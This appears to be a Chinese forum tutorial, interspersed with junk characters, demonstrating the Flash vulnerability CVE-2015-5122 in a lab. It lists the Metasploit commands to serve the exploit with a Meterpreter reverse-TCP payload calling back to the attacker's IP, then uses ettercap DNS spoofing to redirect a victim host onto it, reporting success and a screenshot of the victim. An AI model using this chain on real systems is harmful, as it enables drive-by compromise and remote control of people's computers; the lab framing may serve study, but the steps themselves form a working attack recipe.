二、cve2015-5122漏洞实例演示虚拟机
9 J) ^$ r+ h3 s2 l/ L$ r关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 9 h1 ^6 h; {% k8 f
/ g' Y2 f. s, U% Usearch cve-2015-5122如图: ) m6 E0 b& E* m0 @" w
1 \( S" F$ e0 U' M6 O% u# g4 O0 S+ U3 e3 z/ Z" Y
下面我们敲如下命令:
& {% r0 }7 |; O7 L1 H8 L- Euse exploit/multi/browser/adobe_flash_opaque_background_uaf
' E! }; N! k% C# s6 C$ |; H0 Z3 |; ` set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.109
) ^2 d7 e m* N i) [0 m! q: \; o% Y% I1 e* g8 J# Z% M. ^) N set URIPATH / /*根目录*/
9 q8 t) z6 j. R- e8 N# B* h" y, J4 U$ ]" v1 e( Z6 G6 @* H% k3 n set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
7 s4 a$ Y9 P8 i& X& W8 e, R* n0 R/ C8 C, P set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
5 _1 m, d& F7 W; _+ Z" x T然后show options如图:
8 m6 J& Q, i c6 D1 b5 i+ D. p5 W
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
' j0 Z6 a& r: B1 p0 b( O5 x+ C4 h
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
+ [* S" H' N, [" R J' [7 t, p
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 z$ l# J4 y6 d8 V0 ]6 D
! y7 f' C) u4 b r. @4 D/ Z% l/ C; N9 L" e
: B: U ? ^9 z& M# L- N
8 x& r+ t6 x8 \1 ]; _" J* c4 z 成功了,这时候我们断开ettercap,如图:
( J) D4 Q7 ^6 a' h" ?$ k ]8 X3 q0 ~4 s w1 W! a( I+ ?9 {6 T+ @
; x+ _9 ^( p a I' N; {' h( s
! c, S( { W+ a Screenshot如图:
+ Z* \* Y; X( Y: n+ F& [! ^ }
: a- x8 d# l; t; t4 n9 U
5 m( j1 e8 T; f* l/ C& N' ~
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |